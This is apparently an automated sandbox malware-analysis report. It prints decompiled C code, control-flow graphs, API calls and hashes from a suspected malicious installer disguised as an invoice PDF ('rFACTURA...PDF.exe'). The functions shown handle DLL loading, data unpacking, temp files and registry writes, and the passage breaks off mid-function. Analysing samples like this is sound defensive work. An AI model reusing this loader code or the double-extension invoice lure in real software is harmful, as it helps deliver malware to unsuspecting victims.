                                                                                                  • Snapshot File: hcaresult_0_2_400000_rFACTURA_FAC_2023_1-1000733.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: MessageSend$lstrlen$TextWindowlstrcat
                                                                                                  • String ID:
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  Control-flow Graph

                                                                                                  control_flow_graph 689 4065c9-4065e9 GetSystemDirectoryW 690 4065eb 689->690 691 4065ed-4065ef 689->691 690->691 692 406600-406602 691->692 693 4065f1-4065fa 691->693 695 406603-406636 wsprintfW LoadLibraryExW 692->695 693->692 694 4065fc-4065fe 693->694 694->695
                                                                                                  C-Code - Quality: 100%
                                                                                                  			E004065C9(intOrPtr _a4) {
                                                                                                  				short _v576;
                                                                                                  				signed int _t13;
                                                                                                  				struct HINSTANCE__* _t17;
                                                                                                  				signed int _t19;
                                                                                                  				void* _t24;
                                                                                                  
                                                                                                  				_t13 = GetSystemDirectoryW( &_v576, 0x104);
                                                                                                  				if(_t13 > 0x104) {
                                                                                                  					_t13 = 0;
                                                                                                  				}
                                                                                                  				if(_t13 == 0 ||  *((short*)(_t24 + _t13 * 2 - 0x23e)) == 0x5c) {
                                                                                                  					_t19 = 1;
                                                                                                  				} else {
                                                                                                  					_t19 = 0;
                                                                                                  				}
                                                                                                  				wsprintfW(_t24 + _t13 * 2 - 0x23c, L"%s%S.dll", 0x40a014 + _t19 * 2, _a4);
                                                                                                  				_t17 = LoadLibraryExW( &_v576, 0, 8); // executed
                                                                                                  				return _t17;
                                                                                                  			}









                                                                                                  APIs
                                                                                                  • GetSystemDirectoryW.KERNEL32(?,00000104), ref: 004065E0
                                                                                                  • wsprintfW.USER32 ref: 0040661B
                                                                                                  • LoadLibraryExW.KERNELBASE(?,00000000,00000008), ref: 0040662F
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000000.00000002.1411782168.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_0_2_400000_rFACTURA_FAC_2023_1-1000733.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: DirectoryLibraryLoadSystemwsprintf
                                                                                                  • String ID: %s%S.dll$UXTHEME$\
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  Control-flow Graph

                                                                                                  control_flow_graph 696 4030fa-403111 697 403113 696->697 698 40311a-403123 696->698 697->698 699 403125 698->699 700 40312c-403131 698->700 699->700 701 403141-40314e call 4032f2 700->701 702 403133-40313c call 403308 700->702 706 4032e0 701->706 707 403154-403158 701->707 702->701 708 4032e2-4032e3 706->708 709 40328b-40328d 707->709 710 40315e-403184 GetTickCount 707->710 713 4032eb-4032ef 708->713 711 4032cd-4032d0 709->711 712 40328f-403292 709->712 714 4032e8 710->714 715 40318a-403192 710->715 716 4032d2 711->716 717 4032d5-4032de call 4032f2 711->717 712->714 718 403294 712->718 714->713 719 403194 715->719 720 403197-4031a5 call 4032f2 715->720 716->717 717->706 728 4032e5 717->728 722 403297-40329d 718->722 719->720 720->706 730 4031ab-4031b4 720->730 725 4032a1-4032af call 4032f2 722->725 726 40329f 722->726 725->706 733 4032b1-4032b6 call 405e03 725->733 726->725 728->714 732 4031ba-4031da call 40679a 730->732 737 4031e0-4031f3 GetTickCount 732->737 738 403283-403285 732->738 739 4032bb-4032bd 733->739 740 4031f5-4031fd 737->740 741 40323e-403240 737->741 738->708 742 403287-403289 739->742 743 4032bf-4032c9 739->743 744 403205-403236 MulDiv wsprintfW call 4052c3 740->744 745 4031ff-403203 740->745 746 403242-403246 741->746 747 403277-40327b 741->747 742->708 743->722 748 4032cb 743->748 753 40323b 744->753 745->741 745->744 751 403248-40324f call 405e03 746->751 752 40325d-403268 746->752 747->715 749 403281 747->749 748->714 749->714 756 403254-403256 751->756 755 40326b-40326f 752->755 753->741 755->732 757 403275 755->757 756->742 758 403258-40325b 756->758 757->714 758->755
                                                                                                  C-Code - Quality: 95%
                                                                                                  			E004030FA(int _a4, intOrPtr _a8, intOrPtr _a12, int _a16, signed char _a19) {
                                                                                                  				signed int _v8;
                                                                                                  				int _v12;
                                                                                                  				intOrPtr _v16;
                                                                                                  				long _v20;
                                                                                                  				intOrPtr _v24;
                                                                                                  				short _v152;
                                                                                                  				void* _t65;
                                                                                                  				void* _t69;
                                                                                                  				long _t70;
                                                                                                  				intOrPtr _t74;
                                                                                                  				long _t75;
                                                                                                  				intOrPtr _t76;
                                                                                                  				void* _t77;
                                                                                                  				int _t87;
                                                                                                  				intOrPtr _t91;
                                                                                                  				intOrPtr _t94;
                                                                                                  				long _t95;
                                                                                                  				signed int _t96;
                                                                                                  				int _t97;
                                                                                                  				int _t98;
                                                                                                  				intOrPtr _t99;
                                                                                                  				void* _t100;
                                                                                                  				void* _t101;
                                                                                                  
                                                                                                  				_t96 = _a16;
                                                                                                  				_t91 = _a12;
                                                                                                  				_v12 = _t96;
                                                                                                  				if(_t91 == 0) {
                                                                                                  					_v12 = 0x8000;
                                                                                                  				}
                                                                                                  				_v8 = _v8 & 0x00000000;
                                                                                                  				_v16 = _t91;
                                                                                                  				if(_t91 == 0) {
                                                                                                  					_v16 = 0x78f6d8;
                                                                                                  				}
                                                                                                  				_t62 = _a4;
                                                                                                  				if(_a4 >= 0) {
                                                                                                  					E00403308( *0x7a8a98 + _t62);
                                                                                                  				}
                                                                                                  				if(E004032F2( &_a16, ?str?) == 0) {
                                                                                                  					L41:
                                                                                                  					_push(0xfffffffd);
                                                                                                  					goto L42;
                                                                                                  				} else {
                                                                                                  					if((_a19 & 0x00000080) == 0) {
                                                                                                  						if(_t91 != 0) {
                                                                                                  							if(_a16 < _t96) {
                                                                                                  								_t96 = _a16;
                                                                                                  							}
                                                                                                  							if(E004032F2(_t91, _t96) != 0) {
                                                                                                  								_v8 = _t96;
                                                                                                  								L44:
                                                                                                  								return _v8;
                                                                                                  							} else {
                                                                                                  								goto L41;
                                                                                                  							}
                                                                                                  						}
                                                                                                  						if(_a16 <= _t91) {
                                                                                                  							goto L44;
                                                                                                  						}
                                                                                                  						_t87 = _v12;
                                                                                                  						while(1) {
                                                                                                  							_t97 = _a16;
                                                                                                  							if(_a16 >= _t87) {
                                                                                                  								_t97 = _t87;
                                                                                                  							}
                                                                                                  							if(E004032F2(0x78b6d8, _t97) == 0) {
                                                                                                  								goto L41;
                                                                                                  							}
                                                                                                  							_t69 = E00405E03(_a8, 0x78b6d8, _t97); // executed
                                                                                                  							if(_t69 == 0) {
                                                                                                  								L28:
                                                                                                  								_push(0xfffffffe);
                                                                                                  								L42:
                                                                                                  								_pop(_t65);
                                                                                                  								return _t65;
                                                                                                  							}
                                                                                                  							_v8 = _v8 + _t97;
                                                                                                  							_a16 = _a16 - _t97;
                                                                                                  							if(_a16 > 0) {
                                                                                                  								continue;
                                                                                                  							}
                                                                                                  							goto L44;
                                                                                                  						}
                                                                                                  						goto L41;
                                                                                                  					}
                                                                                                  					_t70 = GetTickCount();
                                                                                                  					 *0x40ce38 =  *0x40ce38 & 0x00000000;
                                                                                                  					_t14 =  &_a16;
                                                                                                  					 *_t14 = _a16 & 0x7fffffff;
                                                                                                  					_v20 = _t70;
                                                                                                  					 *0x40ce20 = 0xb;
                                                                                                  					_a4 = _a16;
                                                                                                  					if( *_t14 <= 0) {
                                                                                                  						goto L44;
                                                                                                  					} else {
                                                                                                  						goto L9;
                                                                                                  					}
                                                                                                  					while(1) {
                                                                                                  						L9:
                                                                                                  						_t98 = 0x4000;
                                                                                                  						if(_a16 < 0x4000) {
                                                                                                  							_t98 = _a16;
                                                                                                  						}
                                                                                                  						if(E004032F2(0x78b6d8, _t98) == 0) {
                                                                                                  							goto L41;
                                                                                                  						}
                                                                                                  						_a16 = _a16 - _t98;
                                                                                                  						 *0x40ce10 = 0x78b6d8;
                                                                                                  						 *0x40ce14 = _t98;
                                                                                                  						while(1) {
                                                                                                  							_t94 = _v16;
                                                                                                  							 *0x40ce18 = _t94;
                                                                                                  							 *0x40ce1c = _v12;
                                                                                                  							_t74 = E0040679A(0x40ce10);
                                                                                                  							_v24 = _t74;
                                                                                                  							if(_t74 < 0) {
                                                                                                  								break;
                                                                                                  							}
                                                                                                  							_t99 =  *0x40ce18; // 0x7924d8
                                                                                                  							_t100 = _t99 - _t94;
                                                                                                  							_t75 = GetTickCount();
                                                                                                  							_t95 = _t75;
                                                                                                  							if(( *0x7a8af4 & 0x00000001) != 0 && (_t75 - _v20 > 0xc8 || _a16 == 0)) {
                                                                                                  								wsprintfW( &_v152, L"... %d%%", MulDiv(_a4 - _a16, 0x64, _a4));
                                                                                                  								_t101 = _t101 + 0xc;
                                                                                                  								E004052C3(0,  &_v152); // executed
                                                                                                  								_v20 = _t95;
                                                                                                  							}
                                                                                                  							if(_t100 == 0) {
                                                                                                  								if(_a16 > 0) {
                                                                                                  									goto L9;
                                                                                                  								}
                                                                                                  								goto L44;
                                                                                                  							} else {
                                                                                                  								if(_a12 != 0) {
                                                                                                  									_t76 =  *0x40ce18; // 0x7924d8
                                                                                                  									_v8 = _v8 + _t100;
                                                                                                  									_v12 = _v12 - _t100;
                                                                                                  									_v16 = _t76;
                                                                                                  									L23:
                                                                                                  									if(_v24 != 4) {
                                                                                                  										continue;
                                                                                                  									}
                                                                                                  									goto L44;
                                                                                                  								}
                                                                                                  								_t77 = E00405E03(_a8, _v16, _t100); // executed
                                                                                                  								if(_t77 == 0) {
                                                                                                  									goto L28;
                                                                                                  								}
                                                                                                  								_v8 = _v8 + _t100;
                                                                                                  								goto L23;
                                                                                                  							}
                                                                                                  						}
                                                                                                  						_push(0xfffffffc);
                                                                                                  						goto L42;
                                                                                                  					}
                                                                                                  					goto L41;
                                                                                                  				}
                                                                                                  			}



























                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000000.00000002.1411782168.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_0_2_400000_rFACTURA_FAC_2023_1-1000733.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: CountTick$wsprintf
                                                                                                  • String ID: ... %d%%
                                                                                                  • API String ID: 551687249-2449383134
                                                                                                  • Opcode ID: 5d95faed883021d29135786fab1021639b0595a9b4acb09984627cea9783b19b
                                                                                                  • Instruction ID: 4304c27296c3acdf0d2a87061290089073c1970791b1d07264e817265a7bbb17
                                                                                                  • Opcode Fuzzy Hash: 5d95faed883021d29135786fab1021639b0595a9b4acb09984627cea9783b19b
                                                                                                  • Instruction Fuzzy Hash: 3C516C31801219EBCB10DF65DA45A9F7BA8AF45766F1442BFE810B72C0C7788F51CBA9
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  Control-flow Graph

                                                                                                  control_flow_graph 759 405792-4057dd CreateDirectoryW 760 4057e3-4057f0 GetLastError 759->760 761 4057df-4057e1 759->761 762 40580a-40580c 760->762 763 4057f2-405806 SetFileSecurityW 760->763 761->762 763->761 764 405808 GetLastError 763->764 764->762
                                                                                                  C-Code - Quality: 100%
                                                                                                  			E00405792(WCHAR* _a4) {
                                                                                                  				struct _SECURITY_ATTRIBUTES _v16;
                                                                                                  				struct _SECURITY_DESCRIPTOR _v36;
                                                                                                  				int _t22;
                                                                                                  				long _t23;
                                                                                                  
                                                                                                  				_v36.Sbz1 = _v36.Sbz1 & 0x00000000;
                                                                                                  				_v36.Owner = 0x4083f0;
                                                                                                  				_v36.Group = 0x4083f0;
                                                                                                  				_v36.Sacl = _v36.Sacl & 0x00000000;
                                                                                                  				_v16.bInheritHandle = _v16.bInheritHandle & 0x00000000;
                                                                                                  				_v16.lpSecurityDescriptor =  &_v36;
                                                                                                  				_v36.Revision = 1;
                                                                                                  				_v36.Control = 4;
                                                                                                  				_v36.Dacl = 0x4083e0;
                                                                                                  				_v16.nLength = 0xc;
                                                                                                  				_t22 = CreateDirectoryW(_a4,  &_v16); // executed
                                                                                                  				if(_t22 != 0) {
                                                                                                  					L1:
                                                                                                  					return 0;
                                                                                                  				}
                                                                                                  				_t23 = GetLastError();
                                                                                                  				if(_t23 == 0xb7) {
                                                                                                  					if(SetFileSecurityW(_a4, 0x80000007,  &_v36) != 0) {
                                                                                                  						goto L1;
                                                                                                  					}
                                                                                                  					return GetLastError();
                                                                                                  				}
                                                                                                  				return _t23;
                                                                                                  			}








                                                                                                  APIs
                                                                                                  • CreateDirectoryW.KERNELBASE(?,?,00000000), ref: 004057D5
                                                                                                  • GetLastError.KERNEL32 ref: 004057E9
                                                                                                  • SetFileSecurityW.ADVAPI32(?,80000007,00000001), ref: 004057FE
                                                                                                  • GetLastError.KERNEL32 ref: 00405808
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000000.00000002.1411782168.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_0_2_400000_rFACTURA_FAC_2023_1-1000733.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: ErrorLast$CreateDirectoryFileSecurity
                                                                                                  • String ID: C:\Users\user\Desktop
                                                                                                  • API String ID: 3449924974-3370423016
                                                                                                  • Opcode ID: c7775b55854fc79259119bfc4daa9494171cd7cf58f96f816c013ac7f64a11dc
                                                                                                  • Instruction ID: 488e367ac99084f0472557c0a26963b348c4b9c4a011ef6404f7c6369f031e52
                                                                                                  • Opcode Fuzzy Hash: c7775b55854fc79259119bfc4daa9494171cd7cf58f96f816c013ac7f64a11dc
                                                                                                  • Instruction Fuzzy Hash: 03011A71C00619DADF009FA1C9447EFBBB4EF14354F00803AD945B6281D7789618CFE9
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  Control-flow Graph

                                                                                                  control_flow_graph 765 405d80-405d8c 766 405d8d-405dc1 GetTickCount GetTempFileNameW 765->766 767 405dd0-405dd2 766->767 768 405dc3-405dc5 766->768 770 405dca-405dcd 767->770 768->766 769 405dc7 768->769 769->770
                                                                                                  C-Code - Quality: 100%
                                                                                                  			E00405D80(void* __ecx, WCHAR* _a4, WCHAR* _a8) {
                                                                                                  				intOrPtr _v8;
                                                                                                  				short _v12;
                                                                                                  				short _t12;
                                                                                                  				intOrPtr _t13;
                                                                                                  				signed int _t14;
                                                                                                  				WCHAR* _t17;
                                                                                                  				signed int _t19;
                                                                                                  				signed short _t23;
                                                                                                  				WCHAR* _t26;
                                                                                                  
                                                                                                  				_t26 = _a4;
                                                                                                  				_t23 = 0x64;
                                                                                                  				while(1) {
                                                                                                  					_t12 =  *L"nsa"; // 0x73006e
                                                                                                  					_t23 = _t23 - 1;
                                                                                                  					_v12 = _t12;
                                                                                                  					_t13 =  *0x40a55c; // 0x61
                                                                                                  					_v8 = _t13;
                                                                                                  					_t14 = GetTickCount();
                                                                                                  					_t19 = 0x1a;
                                                                                                  					_v8 = _v8 + _t14 % _t19;
                                                                                                  					_t17 = GetTempFileNameW(_a8,  &_v12, 0, _t26); // executed
                                                                                                  					if(_t17 != 0) {
                                                                                                  						break;
                                                                                                  					}
                                                                                                  					if(_t23 != 0) {
                                                                                                  						continue;
                                                                                                  					} else {
                                                                                                  						 *_t26 =  *_t26 & _t23;
                                                                                                  					}
                                                                                                  					L4:
                                                                                                  					return _t17;
                                                                                                  				}
                                                                                                  				_t17 = _t26;
                                                                                                  				goto L4;
                                                                                                  			}













                                                                                                  APIs
                                                                                                  • GetTickCount.KERNEL32 ref: 00405D9E
                                                                                                  • GetTempFileNameW.KERNELBASE(?,?,00000000,?,?,?,"C:\Users\user\Desktop\rFACTURA_FAC_2023_1-1000733.PDF.exe",0040334E,1033,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,76F93420,0040359C), ref: 00405DB9
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000000.00000002.1411782168.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_0_2_400000_rFACTURA_FAC_2023_1-1000733.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: CountFileNameTempTick
                                                                                                  • String ID: "C:\Users\user\Desktop\rFACTURA_FAC_2023_1-1000733.PDF.exe"$C:\Users\user\AppData\Local\Temp\$nsa
                                                                                                  • API String ID: 1716503409-3498057549
                                                                                                  • Opcode ID: 579317ece081e1c49d3b274132234632dc0f80c8b4471fc5797a0d742f25062f
                                                                                                  • Instruction ID: 49388a817ab8929663d32c184486222aab3b5007cea287540e7d96a1fedb5290
                                                                                                  • Opcode Fuzzy Hash: 579317ece081e1c49d3b274132234632dc0f80c8b4471fc5797a0d742f25062f
                                                                                                  • Instruction Fuzzy Hash: 56F01D76600304FBEB009F69DD09E9BBBA9EF95750F11807BE900A6290E6B099548B64
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  Control-flow Graph

                                                                                                  control_flow_graph 771 10001759-10001795 call 10001b18 775 100018a6-100018a8 771->775 776 1000179b-1000179f 771->776 777 100017a1-100017a7 call 10002286 776->777 778 100017a8-100017b5 call 100022d0 776->778 777->778 783 100017e5-100017ec 778->783 784 100017b7-100017bc 778->784 785 1000180c-10001810 783->785 786 100017ee-1000180a call 100024a4 call 100015b4 call 10001272 GlobalFree 783->786 787 100017d7-100017da 784->787 788 100017be-100017bf 784->788 793 10001812-1000184c call 100015b4 call 100024a4 785->793 794 1000184e-10001854 call 100024a4 785->794 810 10001855-10001859 786->810 787->783 789 100017dc-100017dd call 10002b57 787->789 791 100017c1-100017c2 788->791 792 100017c7-100017c8 call 1000289c 788->792 802 100017e2 789->802 798 100017c4-100017c5 791->798 799 100017cf-100017d5 call 10002640 791->799 805 100017cd 792->805 793->810 794->810 798->783 798->792 809 100017e4 799->809 802->809 805->802 809->783 814 10001896-1000189d 810->814 815 1000185b-10001869 call 10002467 810->815 814->775 817 1000189f-100018a0 GlobalFree 814->817 821 10001881-10001888 815->821 822 1000186b-1000186e 815->822 817->775 821->814 824 1000188a-10001895 call 1000153d 821->824 822->821 823 10001870-10001878 822->823 823->821 825 1000187a-1000187b FreeLibrary 823->825 824->814 825->821
                                                                                                  C-Code - Quality: 92%
                                                                                                  			E10001759(void* __edx, void* __edi, void* __esi, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20) {
                                                                                                  				void _v36;
                                                                                                  				struct HINSTANCE__* _t34;
                                                                                                  				void* _t36;
                                                                                                  				intOrPtr _t38;
                                                                                                  				void* _t44;
                                                                                                  				void* _t45;
                                                                                                  				void* _t46;
                                                                                                  				void* _t50;
                                                                                                  				intOrPtr _t53;
                                                                                                  				signed int _t57;
                                                                                                  				signed int _t61;
                                                                                                  				void* _t65;
                                                                                                  				void* _t66;
                                                                                                  				void* _t70;
                                                                                                  				void* _t74;
                                                                                                  
                                                                                                  				_t74 = __esi;
                                                                                                  				_t66 = __edi;
                                                                                                  				_t65 = __edx;
                                                                                                  				 *0x1000406c = _a8;
                                                                                                  				 *0x10004070 = _a16;
                                                                                                  				 *0x10004074 = _a12;
                                                                                                  				 *((intOrPtr*)(_a20 + 0xc))( *0x10004048, E100015B1);
                                                                                                  				_push("true");
                                                                                                  				_t34 = E10001B18();
                                                                                                  				_t50 = _t34;
                                                                                                  				if(_t50 == 0) {
                                                                                                  					L28:
                                                                                                  					return _t34;
                                                                                                  				} else {
                                                                                                  					if( *((intOrPtr*)(_t50 + 4)) != 1) {
                                                                                                  						E10002286(_t50);
                                                                                                  					}
                                                                                                  					_push(_t50);
                                                                                                  					E100022D0(_t65);
                                                                                                  					_t53 =  *((intOrPtr*)(_t50 + 4));
                                                                                                  					if(_t53 == 0xffffffff) {
                                                                                                  						L14:
                                                                                                  						if(( *(_t50 + 0x1010) & 0x00000004) == 0) {
                                                                                                  							if( *((intOrPtr*)(_t50 + 4)) == 0) {
                                                                                                  								_t34 = E100024A4(_t50);
                                                                                                  							} else {
                                                                                                  								_push(_t74);
                                                                                                  								_push(_t66);
                                                                                                  								_t12 = _t50 + 0x1018; // 0x1018
                                                                                                  								_t57 = 8;
                                                                                                  								memcpy( &_v36, _t12, _t57 << 2);
                                                                                                  								_t38 = E100015B4(_t50);
                                                                                                  								_t15 = _t50 + 0x1018; // 0x1018
                                                                                                  								_t70 = _t15;
                                                                                                  								 *((intOrPtr*)(_t50 + 0x1020)) = _t38;
                                                                                                  								 *_t70 = 4;
                                                                                                  								E100024A4(_t50);
                                                                                                  								_t61 = 8;
                                                                                                  								_t34 = memcpy(_t70,  &_v36, _t61 << 2);
                                                                                                  							}
                                                                                                  						} else {
                                                                                                  							E100024A4(_t50);
                                                                                                  							_t34 = GlobalFree(E10001272(E100015B4(_t50)));
                                                                                                  						}
                                                                                                  						if( *((intOrPtr*)(_t50 + 4)) != 1) {
                                                                                                  							_t34 = E10002467(_t50);
                                                                                                  							if(( *(_t50 + 0x1010) & 0x00000040) != 0 &&  *_t50 == 1) {
                                                                                                  								_t34 =  *(_t50 + 0x1008);
                                                                                                  								if(_t34 != 0) {
                                                                                                  									_t34 = FreeLibrary(_t34);
                                                                                                  								}
                                                                                                  							}
                                                                                                  							if(( *(_t50 + 0x1010) & 0x00000020) != 0) {
                                                                                                  								_t34 = E1000153D( *0x10004068);
                                                                                                  							}
                                                                                                  						}
                                                                                                  						if(( *(_t50 + 0x1010) & 0x00000002) != 0) {
                                                                                                  							goto L28;
                                                                                                  						} else {
                                                                                                  							_t36 = GlobalFree(_t50); // executed
                                                                                                  							return _t36;
                                                                                                  						}
                                                                                                  					}
                                                                                                  					_t44 =  *_t50;
                                                                                                  					if(_t44 == 0) {
                                                                                                  						if(_t53 != 1) {
                                                                                                  							goto L14;
                                                                                                  						}
                                                                                                  						E10002B57(_t50);
                                                                                                  						L12:
                                                                                                  						_t50 = _t44;
                                                                                                  						L13:
                                                                                                  						goto L14;
                                                                                                  					}
                                                                                                  					_t45 = _t44 - 1;
                                                                                                  					if(_t45 == 0) {
                                                                                                  						L8:
                                                                                                  						_t44 = E1000289C(_t53, _t50); // executed
                                                                                                  						goto L12;
                                                                                                  					}
                                                                                                  					_t46 = _t45 - 1;
                                                                                                  					if(_t46 == 0) {
                                                                                                  						E10002640(_t50);
                                                                                                  						goto L13;
                                                                                                  					}
                                                                                                  					if(_t46 != 1) {
                                                                                                  						goto L14;
                                                                                                  					}
                                                                                                  					goto L8;
                                                                                                  				}
                                                                                                  			}


                                                                                                  APIs
                                                                                                    • Part of subcall function 10001B18: GlobalFree.KERNEL32(?), ref: 10001D83
                                                                                                    • Part of subcall function 10001B18: GlobalFree.KERNEL32(?), ref: 10001D88
                                                                                                    • Part of subcall function 10001B18: GlobalFree.KERNEL32(?), ref: 10001D8D
                                                                                                  • GlobalFree.KERNEL32(00000000), ref: 10001804
                                                                                                  • FreeLibrary.KERNEL32(?), ref: 1000187B
                                                                                                  • GlobalFree.KERNELBASE(00000000), ref: 100018A0
                                                                                                    • Part of subcall function 10002286: GlobalAlloc.KERNEL32(00000040,8BC3C95B), ref: 100022B8
                                                                                                    • Part of subcall function 10002640: GlobalAlloc.KERNEL32(00000040,?,?,?,00000000,?,?,?,?,100017D5,00000000), ref: 100026B2
                                                                                                    • Part of subcall function 100015B4: lstrcpyW.KERNEL32(00000000,10004020), ref: 100015CD
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000000.00000002.1463432748.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                                                  • Associated: 00000000.00000002.1463396007.0000000010000000.00000002.00000001.01000000.00000005.sdmp
                                                                                                  • Associated: 00000000.00000002.1463469816.0000000010003000.00000002.00000001.01000000.00000005.sdmp
                                                                                                  • Associated: 00000000.00000002.1463524699.0000000010005000.00000002.00000001.01000000.00000005.sdmp
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_0_2_10000000_rFACTURA_FAC_2023_1-1000733.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: Global$Free$Alloc$Librarylstrcpy
                                                                                                  • String ID:
                                                                                                  • API String ID: 1791698881-3916222277
                                                                                                  • Opcode ID: 0483f3173a4470b9256ae29dd6c5e6dea881cc340ce9ef3905353ea367717f55
                                                                                                  • Instruction ID: 65685ba44f5e0dd4e22f20931bb662b0f8110762eb821eef9687284fed8b6370
                                                                                                  • Opcode Fuzzy Hash: 0483f3173a4470b9256ae29dd6c5e6dea881cc340ce9ef3905353ea367717f55
                                                                                                  • Instruction Fuzzy Hash: 4A31AC75804241AAFB14DF649CC9BDA37E8FF043D4F158065FA0AAA08FDFB4A984C761
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  C-Code - Quality: 83%
                                                                                                  			E004023DE(void* __eax, int __ebx, intOrPtr __edx) {
                                                                                                  				void* _t20;
                                                                                                  				void* _t21;
                                                                                                  				int _t24;
                                                                                                  				long _t25;
                                                                                                  				int _t30;
                                                                                                  				intOrPtr _t33;
                                                                                                  				void* _t34;
                                                                                                  				intOrPtr _t37;
                                                                                                  				void* _t39;
                                                                                                  				void* _t42;
                                                                                                  
                                                                                                  				_t33 = __edx;
                                                                                                  				_t30 = __ebx;
                                                                                                  				_t37 =  *((intOrPtr*)(_t39 - 0x18));
                                                                                                  				_t34 = __eax;
                                                                                                  				 *(_t39 - 0x4c) =  *(_t39 - 0x14);
                                                                                                  				 *(_t39 - 0x3c) = E00402C37(2);
                                                                                                  				_t20 = E00402C37(0x11);
                                                                                                  				 *(_t39 - 4) = 1;
                                                                                                  				_t21 = E00402CC7(_t42, _t34, _t20, 2); // executed
                                                                                                  				 *(_t39 + 8) = _t21;
                                                                                                  				if(_t21 != __ebx) {
                                                                                                  					_t24 = 0;
                                                                                                  					if(_t37 == 1) {
                                                                                                  						E00402C37(0x23);
                                                                                                  						_t24 = lstrlenW(0x40b5a8) + _t29 + 2;
                                                                                                  					}
                                                                                                  					if(_t37 == 4) {
                                                                                                  						 *0x40b5a8 = E00402C15(3);
                                                                                                  						 *((intOrPtr*)(_t39 - 0x30)) = _t33;
                                                                                                  						_t24 = _t37;
                                                                                                  					}
                                                                                                  					if(_t37 == 3) {
                                                                                                  						_t24 = E004030FA( *((intOrPtr*)(_t39 - 0x1c)), _t30, 0x40b5a8, 0x1800);
                                                                                                  					}
                                                                                                  					_t25 = RegSetValueExW( *(_t39 + 8),  *(_t39 - 0x3c), _t30,  *(_t39 - 0x4c), 0x40b5a8, _t24); // executed
                                                                                                  					if(_t25 == 0) {
                                                                                                  						 *(_t39 - 4) = _t30;
                                                                                                  					}
                                                                                                  					_push( *(_t39 + 8));
                                                                                                  					RegCloseKey(); // executed
                                                                                                  				}
                                                                                                  				 *0x7a8ac8 =  *0x7a8ac8 +  *(_t39 - 4);
                                                                                                  				return 0;
                                                                                                  			}



                                                                                                  APIs
                                                                                                  • lstrlenW.KERNEL32(C:\Users\user\AppData\Local\Temp\nsp1D68.tmp,00000023,?,00000000,00000002,00000011,00000002), ref: 00402429
                                                                                                  • RegSetValueExW.KERNELBASE(?,?,?,?,C:\Users\user\AppData\Local\Temp\nsp1D68.tmp,00000000,?,00000000,00000002,00000011,00000002), ref: 00402469
                                                                                                  • RegCloseKey.KERNELBASE(?,?,?,C:\Users\user\AppData\Local\Temp\nsp1D68.tmp,00000000,?,00000000,00000002,00000011,00000002), ref: 00402551
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000000.00000002.1411782168.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_0_2_400000_rFACTURA_FAC_2023_1-1000733.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: CloseValuelstrlen
                                                                                                  • String ID: C:\Users\user\AppData\Local\Temp\nsp1D68.tmp
                                                                                                  • API String ID: 2655323295-808641140
                                                                                                  • Opcode ID: da5dd1646f1b3941156e64929c72752a0b3671e5fd854432c304d9b0703b255a
                                                                                                  • Instruction ID: 065199c4180da03f85bcad36feea8d83242cacde3b0560515a804f641c4ac6e3
                                                                                                  • Opcode Fuzzy Hash: da5dd1646f1b3941156e64929c72752a0b3671e5fd854432c304d9b0703b255a
                                                                                                  • Instruction Fuzzy Hash: 21119371E00108BEEB10AFA5DE49EAEBAB4EB54354F11803BF504F71D1DBB84D419B58
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  C-Code - Quality: 86%
                                                                                                  			E004015C1(short __ebx, void* __eflags) {
                                                                                                  				void* _t17;
                                                                                                  				int _t23;
                                                                                                  				void* _t25;
                                                                                                  				signed char _t26;
                                                                                                  				short _t28;
                                                                                                  				short _t31;
                                                                                                  				short* _t34;
                                                                                                  				void* _t36;
                                                                                                  
                                                                                                  				_t28 = __ebx;
                                                                                                  				 *(_t36 + 8) = E00402C37(0xfffffff0);
                                                                                                  				_t17 = E00405BDB(_t16);
                                                                                                  				_t32 = _t17;
                                                                                                  				if(_t17 != __ebx) {
                                                                                                  					do {
                                                                                                  						_t34 = E00405B5D(_t32, 0x5c);
                                                                                                  						_t31 =  *_t34;
                                                                                                  						 *_t34 = _t28;
                                                                                                  						if(_t31 != _t28) {
                                                                                                  							L5:
                                                                                                  							_t25 = E0040580F( *(_t36 + 8));
                                                                                                  						} else {
